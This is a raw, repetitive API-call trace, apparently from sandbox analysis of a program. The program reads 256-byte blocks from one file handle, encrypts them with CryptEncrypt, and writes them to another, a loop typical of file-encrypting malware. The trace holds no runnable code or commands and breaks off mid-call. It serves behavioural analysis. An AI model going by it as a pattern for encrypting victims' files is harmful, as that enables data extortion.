WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.661] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.661] GetLastError () returned 0x0 [0148.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.661] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.661] GetLastError () returned 0x0 [0148.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.661] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.661] GetLastError () returned 0x0 [0148.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.661] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.661] GetLastError () returned 0x0 [0148.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.661] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.661] GetLastError () returned 0x0 [0148.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.661] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.661] GetLastError () returned 0x0 [0148.661] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.661] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.662] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.662] GetLastError () returned 0x0 [0148.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.662] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.662] GetLastError () returned 0x0 [0148.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.662] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.662] GetLastError () returned 0x0 [0148.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.662] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.662] GetLastError () returned 0x0 [0148.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.662] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.662] GetLastError () returned 0x0 [0148.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.662] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.662] GetLastError () returned 0x0 [0148.662] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.662] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.663] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.663] GetLastError () returned 0x0 [0148.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.663] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.663] GetLastError () returned 0x0 [0148.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.663] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.663] GetLastError () returned 0x0 [0148.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.663] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.663] GetLastError () returned 0x0 [0148.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.663] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.663] GetLastError () returned 0x0 [0148.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.663] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.663] GetLastError () returned 0x0 [0148.663] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.663] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.663] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.663] GetLastError () returned 0x0 [0148.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.664] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.664] GetLastError () returned 0x0 [0148.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.664] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.664] GetLastError () returned 0x0 [0148.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.664] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.664] GetLastError () returned 0x0 [0148.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.664] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.664] GetLastError () returned 0x0 [0148.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.664] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.664] GetLastError () returned 0x0 [0148.664] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.664] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.664] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.665] GetLastError () returned 0x0 [0148.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.665] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.665] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.665] GetLastError () returned 0x0 [0148.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.665] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.665] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.665] GetLastError () returned 0x0 [0148.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.665] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.665] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.665] GetLastError () returned 0x0 [0148.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.665] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.665] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.665] GetLastError () returned 0x0 [0148.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.665] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.665] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.665] GetLastError () returned 0x0 [0148.665] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.666] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.666] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.666] GetLastError () returned 0x0 [0148.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.666] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.666] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.666] GetLastError () returned 0x0 [0148.666] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 